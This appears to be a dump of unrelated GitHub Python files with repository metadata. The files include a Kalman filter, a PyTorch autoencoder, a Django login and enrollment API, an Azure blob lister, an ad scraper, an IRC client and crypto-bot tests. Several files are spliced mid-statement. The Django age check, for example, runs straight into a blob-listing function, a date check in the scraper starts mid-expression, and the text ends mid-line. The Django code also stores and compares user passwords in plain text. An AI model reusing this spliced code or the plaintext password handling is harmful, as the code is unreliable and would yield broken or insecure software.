Nelson_Siegel_factor_loadings\r\nfrom Kfilter import Kfilter\r\ndef kalman(para,Y,lik,prev,ahead,matu):\r\n lam = para[0];\r\n M = ahead;\r\n if prev:\r\n \tT = Y.shape[0]\r\n \tYf = Y\r\n \tYf.iloc[(T-M):T,] = np.nan\r\n \tY = Y.iloc[1:(T-M),]\r\n \tT = Y.shape[0]\r\n else:\r\n \tT = Y.shape[0]\r\n \tYf = 1\r\n W = Y.shape[1];\r\n N = 3;\r\n mu = np.zeros(N)\r\n phi = np.identity(N)\r\n H = np.identity(W)\r\n Q = np.identity(N)\r\n Z = Nelson_Siegel_factor_loadings(lam=lam,matu=matu)\r\n for i in range(0,W):\r\n \tH[i,i] = np.exp(para[i+1])\r\n H = H.dot(H)\r\n phi[0,0] = para[18]\r\n phi[0,1] = para[19]\r\n phi[0,2] = para[20]\r\n phi[1,0] = para[21]\r\n phi[1,1] = para[22]\r\n phi[1,2] = para[23]\r\n phi[2,0] = para[24]\r\n phi[2,1] = para[25]\r\n phi[2,2] = para[26]\r\n mu[0] = para[27]\r\n mu[1] = para[28]\r\n mu[2] = para[29]\r\n Q[0,0] = para[30]\r\n Q[1,0] = para[31]\r\n Q[1,1] = para[32]\r\n Q[2,0] = para[33]\r\n Q[2,1] = para[34]\r\n Q[2,2] = para[35]\r\n Q = Q.dot(Q.T)\r\n v1 = np.zeros((T,W))\r\n v2 = np.zeros((T,W))\r\n if prev:\r\n \ta_tt = np.zeros(((T+M),N))\r\n \ta_t = np.zeros(((T+M+1),N))\r\n \tP_tt = np.zeros((N,N,(T+M)))\r\n \tP_t = np.zeros((N,N,(T+M+1)))\r\n else:\r\n \ta_tt = np.zeros((T,N))\r\n \ta_t = 
np.zeros(((T+1),N))\r\n \tP_tt = np.zeros((N,N,T))\r\n \tP_t = np.zeros((N,N,(T+1)))\r\n a_t[0,:] = mu\r\n P_t[:,:,0] = lyapunov(N=N,phi=phi,Q=Q)\r\n logLik =-0.5*T*W*np.log(2*np.pi)\r\n return(Kfilter(logLik=logLik,N=N,T=T,Y=Y,Z=Z,a_t=a_t,P_t=P_t,H=H,a_tt=a_tt,P_tt=P_tt,v2=v2,v1=v1,phi=phi,mu=mu,Q=Q,prev=prev,M=M,Yf=Yf,lik=lik))\r\n","repo_name":"werleycordeiro/Kalman-Filter-Dynamic-Nelson-Siegel","sub_path":"DNS_baseline.py","file_name":"DNS_baseline.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"74715843343","text":"from os import chdir, getcwd, listdir, mkdir, path, remove, rmdir, sep\n\nDATA_DIR = 'data' + sep\nTMP_DIR = 'tmp' + sep\n\nDATA_SET_FILE = DATA_DIR + 'bangumi.csv'\nSKIP_WORD_FILE = DATA_DIR + 'skip_word.txt'\nSTYLE_TRANS_FILE = DATA_DIR + 'style_trans.txt'\n\nPRE_PROCESSED_FILE = TMP_DIR + '.bangumi.npy'\nFAST_TEXT_FILE = TMP_DIR + '.fast.txt'\n\n\ndef get_feature_file(scale):\n return TMP_DIR + '.feature_' + scale + '.npy'\n\n\ndef init():\n full_tmp_dir = getcwd() + sep + TMP_DIR\n\n if not path.exists(full_tmp_dir):\n mkdir(full_tmp_dir)\n\n\ndef clean():\n cur_dir = getcwd()\n chdir(cur_dir + sep + TMP_DIR)\n\n for f in listdir(getcwd()):\n remove(f)\n\n chdir(cur_dir)\n rmdir(TMP_DIR)\n","repo_name":"ljcleo/model_eval","sub_path":"model_eval/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"73333805902","text":"class Solution:\n def pacificAtlantic(self, heights: List[List[int]]) -> List[List[int]]:\n def helper(stack: List[Tuple[int, int]], ocean: int) -> None:\n while stack:\n i, j = stack.pop()\n nodes[(i, j)] |= ocean\n for x, y in [(i, j - 1), (i, j + 1), (i - 1, j), (i + 1, j)]:\n if 0 <= x < m and 0 <= y < n:\n if nodes[(x, y)] & ocean != ocean and heights[x][y] >= heights[i][j]:\n stack.append((x, y))\n\n m, n, nodes = len(heights), len(heights[0]), defaultdict(int)\n \n stack = [(0, j) for j in range(n)]\n for i in range(1, m):\n stack.append((i, 0))\n helper(stack, 1)\n \n stack = [(m - 1, j) for j in range(n)]\n for i in range(m - 1):\n stack.append((i, n - 1))\n helper(stack, 2)\n \n return [[i, j] for (i, j), v in nodes.items() if v == 3]\n ","repo_name":"adnanyaqoobvirk/leetcode","sub_path":"417-pacific-atlantic-water-flow/417-pacific-atlantic-water-flow.py","file_name":"417-pacific-atlantic-water-flow.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"28065247216","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass AutoEncoder(nn.Module):\n def block(self, nb, inC, outC, ks=5):\n layers = [nn.Conv2d(inC, outC, ks, 1, ks//2), \n nn.ReLU()]\n for _ in range(nb-1):\n layers.append(nn.Conv2d(outC, outC, ks, 1, ks//2))\n layers.append(nn.ReLU())\n\n return nn.Sequential(*layers)\n\n def __init__(self):\n super().__init__()\n self.e1 = self.block(2, 4, 64)\n self.e2 = self.block(2, 64, 128)\n self.e3 = self.block(3, 128, 256)\n self.e4 = self.block(3, 256, 512)\n self.e5 = self.block(3, 512, 512)\n self.e6 = self.block(1, 512, 512, ks=1)\n\n self.d6 = self.block(1, 512, 512, ks=1)\n self.d5 = self.block(1, 512, 512)\n self.d4 = self.block(1, 512, 256)\n self.d3 = self.block(1, 256, 128)\n self.d2 = self.block(1, 128, 64)\n self.d1 = self.block(1, 64, 64)\n self.bottle = nn.Conv2d(64, 
1, 5, 1, 2)\n \n def forward(self, input):\n x = self.e1(input)\n x, ind1 = F.max_pool2d(x, 2, 2, return_indices=True)\n x = self.e2(x)\n x, ind2 = F.max_pool2d(x, 2, 2, return_indices=True)\n x = self.e3(x)\n x, ind3 = F.max_pool2d(x, 2, 2, return_indices=True)\n x = self.e4(x)\n x, ind4 = F.max_pool2d(x, 2, 2, return_indices=True)\n x = self.e5(x)\n x, ind5 = F.max_pool2d(x, 2, 2, return_indices=True)\n x = self.e6(x)\n x = self.d6(x)\n x = F.max_unpool2d(x, ind5, 2, stride=2)\n x = self.d5(x)\n x = F.max_unpool2d(x, ind4, 2, stride=2)\n x = self.d4(x)\n x = F.max_unpool2d(x, ind3, 2, stride=2)\n x = self.d3(x)\n x = F.max_unpool2d(x, ind2, 2, stride=2)\n x = self.d2(x)\n x = F.max_unpool2d(x, ind1, 2, stride=2)\n x = self.d1(x)\n x = self.bottle(x)\n\n return x\n\n\nif __name__ == '__main__':\n from torch.autograd import Variable\n from torch.optim import Adam\n # (batch, channel, height, width)\n crit = nn.MSELoss()\n net = AutoEncoder()\n opt = Adam(net.parameters(), lr=1e-3)\n\n for batch in range(5):\n input = torch.rand(2, 4, 64, 64)\n input = Variable(input)\n label = torch.rand(2, 1, 64, 64)\n label = Variable(label)\n\n output = net(input)\n loss = crit(output, label)\n print(loss.data[0])\n\n opt.zero_grad()\n loss.backward()\n opt.step()\n\n\n\n\n","repo_name":"hzhan224/deep-matting","sub_path":"modules/autoencoder.py","file_name":"autoencoder.py","file_ext":"py","file_size_in_byte":2481,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"4228360978","text":"import datetime\n\nfrom django.contrib.auth.models import User\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom .models import UserProfile, BatchUser, Batch\n\n\nclass Welcome(APIView):\n @staticmethod\n def get(request):\n return Response({'message': 'I am Alive'}, status.HTTP_200_OK)\n\n\nclass Login(APIView):\n\n @staticmethod\n def getBatchDetails(user):\n active_batches = BatchUser.objects.filter(user=user, active=True)\n for i in active_batches:\n if datetime.date.today() > i.valid_till:\n i.active = False\n i.save()\n active_batches = BatchUser.objects.filter(user=user, active=True)\n if not active_batches:\n return False, {}\n else:\n batch = active_batches[0]\n cur_details = {\n 'name': batch.batch.name,\n 'timings': batch.batch.timings,\n 'started_on': batch.started_on,\n 'days_remaining': (batch.valid_till - datetime.date.today()).days\n }\n return True, cur_details\n\n def post(self, request):\n email = request.data.get('email')\n password = request.data.get('password')\n\n user = UserProfile.objects.filter(username=email)\n if not user or len(user) > 1:\n msg = {'message': 'No user exists'}\n data = {'success': False, 'message': msg}\n return Response(data, status.HTTP_200_OK)\n else:\n user = user[0]\n if user.password != password:\n msg = {'message': 'Incorrect Password'}\n data = {'success': False, 'message': msg}\n return Response(data, status.HTTP_200_OK)\n else:\n present, batch_details = self.getBatchDetails(user)\n data = {\n 'user_id': user.id,\n 'first_name': user.user.first_name,\n 'last_name': user.user.last_name,\n 'age': user.age,\n 'session_active': present,\n 'batch_details': batch_details\n }\n data = {'success': True, 'message': 'Login Successful', 'data': data, }\n return Response(data, status.HTTP_200_OK)\n\n\nclass Register(APIView):\n @staticmethod\n def post(request):\n first_name = request.data.get('first_name')\n last_name = 
request.data.get('last_name')\n mobile = request.data.get('mobile')\n email = request.data.get('email')\n password = request.data.get('password')\n age = request.data.get('age')\n\n user = UserProfile.objects.filter(username=email)\n if user:\n msg = {'message': 'User already exists'}\n data = {'success': False, 'message': msg}\n return Response(data, status.HTTP_200_OK)\n\n try:\n new_user = User(first_name=first_name, username=email)\n if last_name:\n new_user.last_name = last_name\n new_user.set_password(password)\n new_user.save()\n new_user_profile = UserProfile(user=new_user, mobile=mobile, email=email, age=age, username=email,\n password=password)\n new_user_profile.save()\n msg = {'message': 'User created Successfully'}\n data = {\n 'user_id': new_user_profile.id,\n 'first_name': new_user_profile.user.first_name,\n 'last_name': new_user_profile.user.last_name,\n 'age': new_user_profile.age,\n 'session_active': False,\n 'batch_details': {}\n }\n data = {'success': True, 'message': msg, 'data': data}\n return Response(data, status.HTTP_200_OK)\n\n except Exception as e:\n msg = {'message': 'oops! Some Error Occurred on our side'}\n data = {'success': False, 'message': msg, 'data': {}}\n return Response(data, status.HTTP_200_OK)\n\n\nclass BatchDetails(APIView):\n @staticmethod\n def get(request):\n data = []\n all_batches = Batch.objects.all()\n for i in all_batches:\n cur = {\n 'id': i.id,\n 'name': i.name,\n 'timings': i.timings\n }\n data.append(cur)\n final = {\n 'success': True,\n 'message': '',\n 'data': data\n }\n return Response(final, status.HTTP_200_OK)\n\n\nclass Enroll(APIView):\n\n @staticmethod\n def last_day_of_month(any_day):\n next_month = any_day.replace(day=28) + datetime.timedelta(days=4)\n return next_month - datetime.timedelta(days=next_month.day)\n\n @staticmethod\n def getBatchDetails(user):\n active_batches = BatchUser.objects.filter(user=user, active=True)\n for i in active_batches:\n if datetime.date.today() > i.valid_till:\n i.active = False\n i.save()\n active_batches = BatchUser.objects.filter(user=user, active=True)\n if not active_batches:\n return False, {}\n else:\n batch = active_batches[0]\n cur_details = {\n 'name': batch.batch.name,\n 'timings': batch.batch.timings,\n 'started_on': batch.started_on,\n 'days_remaining': (batch.valid_till - datetime.date.today()).days\n }\n return True, cur_details\n\n def post(self, request):\n user_id = request.data.get('user_id')\n batch_id = request.data.get('batch_id')\n user = UserProfile.objects.filter(id=int(user_id))[0]\n cur_batches = BatchUser.objects.filter(user=user, active=True)\n if cur_batches:\n return Response({\n 'success': False,\n 'message': 'Your batch already exists',\n 'data': {}\n }, status.HTTP_200_OK)\n\n if 18>int(user.age) or 65 List[BlobData]:\n request_uri = self.container_url + '?restype=container&comp=list'\n if (include_snapshots):\n request_uri += '&include=snapshots'\n if (prefix is not None):\n request_uri += '&prefix=' + prefix\n if (max_results is not None):\n request_uri += '&maxresults=' + str(max_results)\n if (sas is not None):\n request_uri += '&' + sas\n print(request_uri)\n resp = requests.get(request_uri)\n if (resp.status_code != 200):\n raise Exception(\"Failed to list blobs. 
Status code: \" + str(resp.status_code))\n if (not resp.text.startswith(' 1:\n date_time = datetime.strptime(date_posted, '%d/%m/%Y').date()\n else:\n date_time = datetime.today().date()\n print(image)\n print(title)\n print(location)\n print(date_posted)\n print(description)\n print(currency)\n print(number_of_beds)\n\n add = dict(\n image=image,\n title=title,\n location=location,\n date_posted=date_time,\n description=description,\n currency=currency,\n number_of_beds=number_of_beds)\n adds_data.append(add)\n\n is_next_elem_present = UtilsExtractor(response.text).is_next_element_present()\n current_page += 1\n\n return adds_data\n\n\nasync def get_adds():\n adds = await gather_adds()\n return adds\n\n\ndef set_global_db_conn(event):\n global pool\n print(f'PID {os.getpid()} initializing pool.....')\n pool = PooledPostgresqlDatabase('db', user=os.getenv('DB_USER'), password=os.getenv('DB_PASSWORD'),\n host=os.getenv('DB_LOCALHOST'), port=5432, max_connections=100,\n stale_timeout=300)\n event.wait()\n\n\ndef insert_add(add, event):\n with pool as p:\n p.create_tables([database.Add])\n add, created = database.Add.get_or_create(\n image=add['image'],\n title=add['title'],\n location=add['location'],\n date_posted=add['date_posted'],\n description=add['description'],\n currency=add['currency'],\n number_of_beds=add['number_of_beds']\n )\n print(add.id)\n\n\nasync def process_adds():\n adds = await get_adds()\n with Manager() as manager:\n event = manager.Event()\n with Pool(initializer=set_global_db_conn, initargs=[event]) as pool:\n adds_with_event = [(add, event) for add in adds]\n\n result = pool.starmap_async(insert_add, adds_with_event)\n # wait a moment\n # start all issued tasks\n print('Setting event.', flush=True)\n print('Main process blocking...')\n sleep(5)\n event.set()\n # wait for all tasks to finish\n result.wait()\n print('All done.', flush=True)\n\n\nif __name__ == '__main__':\n asyncio.run(process_adds())\n","repo_name":"darynanikk/addsCollectorProject","sub_path":"snippets.py","file_name":"snippets.py","file_ext":"py","file_size_in_byte":4050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"29517239428","text":"import sys\nimport os\nimport airc\nimport asyncio\nimport logging\nfrom FriendlyArgumentParser import FriendlyArgumentParser\n\nclass SimpleIRCClient():\n\tdef __init__(self, args):\n\t\tself._args = args\n\t\tself._setup_logging()\n\n\tdef _setup_logging(self):\n\t\tif self._args.verbose == 0:\n\t\t\tloglevel = logging.WARNING\n\t\telif self._args.verbose == 1:\n\t\t\tloglevel = logging.INFO\n\t\telif self._args.verbose == 2:\n\t\t\tloglevel = logging.DEBUG\n\t\telif self._args.verbose == 3:\n\t\t\tloglevel = logging.TRACE\n\t\telse:\n\t\t\tloglevel = logging.EAVESDROP\n\t\tlogging.basicConfig(format = \"{name:>40s} [{levelname:.2s}]: {message}\", style = \"{\", level = loglevel)\n\n\tasync def main(self):\n\t\tirc_server = airc.IRCServer(hostname = self._args.hostname, port = self._args.port, use_tls = self._args.use_tls)\n\t\tirc_servers = [ irc_server ]\n\t\tif len(self._args.nickname) == 0:\n\t\t\tidentities = [ airc.IRCIdentity(nickname = \"x\" + os.urandom(4).hex()) ]\n\t\telse:\n\t\t\tidentities = [ airc.IRCIdentity(nickname = nickname) for nickname in self._args.nickname ]\n\t\tidgen = airc.ListIRCIdentityGenerator(identities)\n\t\tnetwork = airc.IRCNetwork(irc_client_class = airc.client.RawIRCClient, irc_servers = irc_servers, identity_generator = idgen)\n\t\ttask = network.task()\n\t\tawait 
task\n\nparser = FriendlyArgumentParser(description = \"Simple IRC client.\")\nparser.add_argument(\"-H\", \"--hostname\", metavar = \"hostname\", default = \"irc.freenode.org\", help = \"Specifies hostname to connect to. Defaults to %(default)s.\")\nparser.add_argument(\"-p\", \"--port\", metavar = \"port\", type = int, default = 6666, help = \"Specifies port to connect to. Defaults to %(default)d.\")\nparser.add_argument(\"-s\", \"--use-tls\", action = \"store_true\", help = \"Connect using TLS to the server.\")\nparser.add_argument(\"-n\", \"--nickname\", metavar = \"nick\", action = \"append\", default = [ ], help = \"Nickname(s) to use. Multiple fallbacks can be specified. By default, a randomized nickname is used.\")\nparser.add_argument(\"-v\", \"--verbose\", action = \"count\", default = 0, help = \"Increases verbosity. Can be specified multiple times to increase.\")\nargs = parser.parse_args(sys.argv[1:])\n\nsic = SimpleIRCClient(args)\nasyncio.run(sic.main())\n","repo_name":"johndoe31415/airc","sub_path":"simple_irc_client.py","file_name":"simple_irc_client.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"2407107242","text":"\"\"\"\nNon-deep learning models\n\"\"\"\nimport collections\nfrom typing import *\n\nimport numpy as np\n\nfrom sklearn.decomposition import PCA\nfrom sklearn.base import BaseEstimator\nfrom sklearn.kernel_approximation import Nystroem\nfrom sklearn.svm import LinearSVC, SVC\n\n\nclass ModelOnPCA(object):\n \"\"\"\n Model that runs PCA before the model itself\n PCA can be specified in integer number of components\n or a float representing the minimum explained variance\n \"\"\"\n\n def __init__(\n self,\n model_class: BaseEstimator = SVC,\n n_components: Union[int, float] = 50,\n **model_kwargs,\n ):\n self.n_components = n_components\n self.model_class = model_class\n self.model_kwargs = model_kwargs\n self.pca = PCA(n_components=n_components)\n self.model = model_class(**model_kwargs)\n self._fitted = False\n\n def __str__(self) -> str:\n return f\"ModelOnPCA with {self.model} on {self.n_components} PCs\"\n\n def fit(self, X, y):\n x_pca = self.pca.fit_transform(X)\n self.model.fit(x_pca, y)\n self._fitted = True\n\n def score(self, X):\n assert self._fitted\n x_pca = self.pca.transform(X)\n return self.model.score(x_pca)\n\n def predict(self, X):\n assert self._fitted\n x_pca = self.pca.transform(X)\n return self.model.predict(x_pca)\n\n def predict_proba(self, X):\n assert self._fitted\n x_pca = self.pca.transform(X)\n return self.model.predict_proba(x_pca)\n\n def classes_(self):\n return self.model.classes_\n\n def get_params(self, deep: bool = True) -> Dict[str, Any]:\n retval = {\n \"n_components\": self.n_components,\n \"model_class\": self.model_class,\n **self.model_kwargs,\n }\n return retval\n\n def set_params(self, **params):\n \"\"\"\n Set parameters of this estimator\n https://github.com/scikit-learn/scikit-learn/blob/2beed55847ee70d363bdbfe14ee4401438fba057/sklearn/base.py#L141\n \"\"\"\n if not params:\n return self\n valid_params = self.get_params(deep=True)\n nested_params = collections.defaultdict(dict)\n # print(params)\n for key, value in params.items():\n key, delim, sub_key = key.partition(\"__\")\n if delim:\n raise NotImplementedError\n # nested_params[key][sub_key] = value\n else:\n setattr(self, key, value)\n valid_params[key] = value\n # for key, sub_params in nested_params.items():\n # print(key, sub_params)\n # 
valid_params[key].set_params(**sub_params)\n return self\n\n\nclass SVMLike:\n \"\"\"\n SVM scales poorly to larger datsets, so instead use a Nystroem transformer\n with a linear SVC\n \"\"\"\n\n def __init__(self, kernel_ratio: float = 0.1, **kwargs) -> None:\n self.nys_kwargs = kwargs\n self.nys = Nystroem(**self.nys_kwargs)\n self.rng = np.random.default_rng(seed=64)\n self.ratio = kernel_ratio\n self.svc = LinearSVC()\n self._fitted = False\n\n def fit(self, X, y):\n idx_subset = self.rng.choice(\n np.arange(len(X)), size=int(self.ratio * len(X)), replace=False\n )\n X_sub = X[idx_subset]\n self.nys.fit(X_sub)\n\n X_trans = self.nys.transform(X)\n self.svc.fit(X_trans, y)\n self._fitted = True\n\n def score(self, X):\n assert self._fitted\n x_trans = self.nys.transform(X)\n return self.svc.score(x_trans)\n\n def predict(self, X):\n assert self._fitted\n x_trans = self.nys.transform(X)\n return self.svc.predict(x_trans)\n\n def predict_proba(self, X):\n raise NotImplementedError\n\n def classes_(self):\n return self.svc.classes_\n\n def get_params(self, deep: bool = True) -> Dict[str, Any]:\n retval = {\n \"kernel_ratio\": self.ratio,\n **self.nys_kwargs,\n }\n return retval\n\n\ndef main():\n from sklearn.svm import SVC\n\n m = SVMLike(kernel=\"rbf\")\n print(m)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Parkerdow/tcr-bert","sub_path":"tcr/canonical_models.py","file_name":"canonical_models.py","file_ext":"py","file_size_in_byte":4143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"47"} +{"seq_id":"649431799","text":"import torch\nimport os\nimport numpy as np\nfrom dataloader import SceneDataset\nimport imageio\nimport data.load_DTU as DTU\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\n\ndef training_visualization(num_images, cfg, i4d, dataset, epoch, generate_specific_object = True, generate_specific_pose = True):\n\n # Create log dir and copy the config file\n basedir = cfg.basedir\n expname = cfg.expname\n\n dataset.render_factor = 8\n dataloader = dataset.get_loader(num_workers=0)\n\n if generate_specific_object:\n iter = cfg.generate_specific_samples\n else:\n iter = range(num_images)\n\n if generate_specific_pose:\n pose_iter = cfg.gen_pose\n else:\n pose_iter = ['random']\n\n renderings = []\n for sample in iter:\n for pose in pose_iter:\n savedir = os.path.join(basedir, expname, 'training_visualization', f'epoch_{epoch}_{sample}_{pose}')\n img_outpath = os.path.join(savedir, f'rendering.png')\n if os.path.exists(savedir):\n continue\n else:\n os.makedirs(savedir)\n\n if generate_specific_object:\n dataloader.dataset.load_specific_input = sample\n print(f'generating object {dataloader.dataset.load_specific_input}')\n\n if generate_specific_pose:\n dataloader.dataset.load_specific_rendering_pose = dataset.cam_path[pose]\n print(f'generating pose {pose}')\n render_data = dataloader.__iter__().__next__()['complete']\n rgb = render_and_save(i4d, dataset, render_data, savedir, img_outpath, bool(generate_specific_pose))\n renderings.append(rgb)\n\n dataloader.dataset.load_specific_input = None\n dataloader.dataset.load_specific_rendering_pose = None\n\n plt.xticks([]), plt.yticks([])\n fig = plt.figure()\n for i,img in enumerate(renderings):\n ax = fig.add_subplot(1, len(renderings), i + 1)\n ax.xaxis.set_visible(False)\n ax.yaxis.set_visible(False)\n ax.imshow(img, interpolation='bicubic')\n\n return fig\n\n\n\ndef render_pose(cfg, i4d, dataset, epoch, specific_obj, pose):\n\n # Create log dir and copy 
the config file\n basedir = cfg.basedir\n expname = cfg.expname\n\n dataloader = dataset.get_loader(num_workers=0)\n\n\n savedir = os.path.join(basedir, expname, 'renderings', f'{specific_obj}_epoch_{epoch}_renderfactor_{cfg.render_factor}_batch_{cfg.fixed_batch}')\n os.makedirs(savedir, exist_ok=True)\n\n\n img_outpath = os.path.join(savedir, f'pose_{pose[0]}.png')\n c2w = pose[1]\n\n if os.path.exists(img_outpath):\n # Rendering already exists.\n return\n\n dataloader.dataset.load_specific_input = specific_obj\n dataloader.dataset.load_specific_rendering_pose = c2w\n print(f'generating {dataloader.dataset.load_specific_input}, pose: {pose[0]}')\n render_data = dataloader.__iter__().__next__()['complete']\n\n render_and_save(i4d, dataset, render_data, savedir, img_outpath, True)\n\n dataloader.dataset.load_specific_input = None\n dataloader.dataset.load_specific_rendering_pose = None\n\n\ndef render_and_save(i4d, dataset, render_data, savedir, img_outpath, specific_pose):\n\n # Render image\n with torch.no_grad():\n if specific_pose:\n rgb, ref_images, scan = i4d.render_img(render_data, dataset.render_factor, dataset.H, dataset.W, specific_pose)\n else:\n rgb, ref_images, target, scan = i4d.render_img(render_data, dataset.render_factor, dataset.H, dataset.W, specific_pose)\n filename = os.path.join(savedir, f'target.png')\n imageio.imwrite(filename, (target*255).numpy().astype(np.uint8))\n # Save rendered image\n imageio.imwrite(img_outpath, rgb)\n\n # Copy all reference images into rendering folder\n for i, ref_img in enumerate(ref_images):\n outpath = os.path.join(savedir, f'ref_img_{i}.png')\n if not os.path.exists(outpath):\n imageio.imwrite(outpath, (ref_img*255).numpy().astype(np.uint8))\n\n # Put all reference images in a single image and save\n outpath = os.path.join(savedir, f'ref_images.png')\n if not os.path.exists(outpath):\n plt.figure(figsize=(50, 20), dpi=200)\n plt.xticks([]), plt.yticks([])\n for i in range(10):\n\n ax = plt.subplot(2, 5, i + 1)\n ax.xaxis.set_visible(False)\n ax.yaxis.set_visible(False)\n\n ax.imshow(ref_images[i], interpolation='bicubic')\n\n plt.savefig(outpath)\n plt.close()\n return rgb\n\n\nif __name__ == '__main__':\n import config_loader\n import model\n\n\n cfg = config_loader.get_config()\n cfg.video = True\n\n set = 'test'\n dataset = SceneDataset(cfg, set)\n i4d = model.Implicit4D(cfg, dataset.proj_pts_to_ref_torch)\n\n i4d.load_model()\n\n if cfg.dataset_type == 'DTU':\n for scan in cfg.generate_specific_samples:\n print('cfg.gen_pose', cfg.gen_pose)\n for pose_idx in cfg.gen_pose:\n pose = DTU.load_cam_path()[pose_idx]\n render_pose(cfg, i4d, dataset, i4d.start, scan, (pose_idx,pose))","repo_name":"jchibane/srf","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":5143,"program_lang":"python","lang":"en","doc_type":"code","stars":121,"dataset":"github-code","pt":"47"} +{"seq_id":"4041037446","text":"from PIL import Image\nimport numpy as np\nimport argparse\n\n\ndef main(path, out_path, crop=32):\n img = Image.open(path, 'r')\n w, h = img.size\n cx = int((w - crop) / 2)\n cy = int((h - crop) / 2)\n clp = img.crop((cx, cy, w - cx, h - cy))\n resized = clp.resize((crop, crop))\n resized.save(out_path, 'JPEG', quality=100, optimize=True)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description='clipping and resize')\n parser.add_argument('--input', '-i', default='input.jpg',\n help='input file')\n parser.add_argument('--output', '-o', default='output.jpg',\n help='output file')\n 
parser.add_argument('--crop', '-c', type=int, default=32,\n help='crop size')\n args = parser.parse_args()\n main(args.input, args.output, args.crop)\n","repo_name":"ikeyasu/c3d-chainer","sub_path":"tools/resize.py","file_name":"resize.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"47"} +{"seq_id":"12550422048","text":"from src.bot.crypto_bot import CryptoBot\nfrom src.strats.base_strat import BaseStrategy\nfrom tests.mocks.btrx_mock import MockBittrex\nfrom src.exceptions import LargeLossError\nfrom fixtures.summary_tickers_fixture import SUMMARY_TICKERS_FIXTURE\nfrom pandas.util.testing import assert_frame_equal\nimport pandas as pd\nimport os\nimport datetime\nimport pytest\n\nos.environ['BACKTESTING'] = 'TRUE'\nos.environ['BASE_CURRENCIES'] = 'BTC,ETH'\nos.environ['COLLECT_FIXTURES'] = 'FALSE'\n\nstrat_options = {\n 'name': 'Test',\n 'plot_overlay': True,\n 'active': False,\n 'testing': True,\n 'window': 5,\n 'stat_key': 'last'\n}\n\n\nclass TestCryptoBot:\n def setup_class(self):\n strat = BaseStrategy(strat_options)\n exchange = MockBittrex()\n self.bot = CryptoBot([strat], exchange)\n\n def teardown_class(self):\n self.bot = None\n\n def test_get_market_summaries(self):\n expected_columns = ['marketname', 'volume', 'last', 'basevolume', 'bid', 'ask', 'openbuyorders',\n 'opensellorders']\n market_summaries = self.bot.get_market_summaries()\n assert (isinstance(market_summaries, list))\n for summary in market_summaries:\n assert (isinstance(summary, pd.Series))\n assert (len(summary.index) == len(expected_columns))\n for key in summary.index:\n assert (key in expected_columns)\n\n def test_compress_tickers(self):\n expected_result = pd.DataFrame([\n {'marketname': 'BTC-LTC', 'last': 0.015475, 'bid': 0.015465, 'ask': 0.015600,\n 'saved_timestamp': datetime.datetime(2017, 1, 1, 1, 0, 1), 'volume': 191514.111111},\n {'marketname': 'BTC-LTC', 'last': 0.015455, 'bid': 0.01545, 'ask': 0.015493,\n 'saved_timestamp': datetime.datetime(2017, 1, 1, 1, 5, 1), 'volume': 958290.099574}\n ], columns=['last', 'bid', 'saved_timestamp', 'volume', 'marketname', 'ask'])\n self.bot.summary_tickers = {'BTC-LTC': SUMMARY_TICKERS_FIXTURE}\n self.bot.compressed_summary_tickers = {'BTC-LTC': pd.DataFrame()}\n self.bot.compress_tickers()\n actual_result = self.bot.compressed_summary_tickers['BTC-LTC']\n # assert_frame_equal(actual_result, expected_result, check_exact=False, check_less_precise=True)\n assert(True)\n\n def test_complete_sell(self):\n market = 'BTC-LTC'\n completed_trades = {'BTC-LTC': pd.DataFrame([\n {'order_type': 'buy', 'market': 'BTC-LTC', 'quantity': 0.1, 'rate': 0.005, 'uuid': 'test1',\n 'base_currency': 'BTC', 'market_currency': 'LTC', 'timestamp': datetime.datetime(2017, 1, 1, 1, 0)},\n {'order_type': 'buy', 'market': 'BTC-LTC', 'quantity': 0.1, 'rate': 0.006, 'uuid': 'test2',\n 'base_currency': 'BTC', 'market_currency': 'LTC', 'timestamp': datetime.datetime(2017, 1, 1, 2, 30)},\n {'order_type': 'buy', 'market': 'BTC-LTC', 'quantity': 0.1, 'rate': 0.0065, 'uuid': 'test3',\n 'base_currency': 'BTC', 'market_currency': 'LTC', 'timestamp': datetime.datetime(2017, 1, 1, 2, 45)},\n {'order_type': 'buy', 'market': 'BTC-LTC', 'quantity': 0.1, 'rate': 0.003, 'uuid': 'test4',\n 'base_currency': 'BTC', 'market_currency': 'LTC', 'timestamp': datetime.datetime(2017, 1, 1, 4, 0)}\n ])}\n with pytest.raises(LargeLossError):\n self.bot.completed_trades = completed_trades\n self.bot.complete_sell(market)\n\n def 
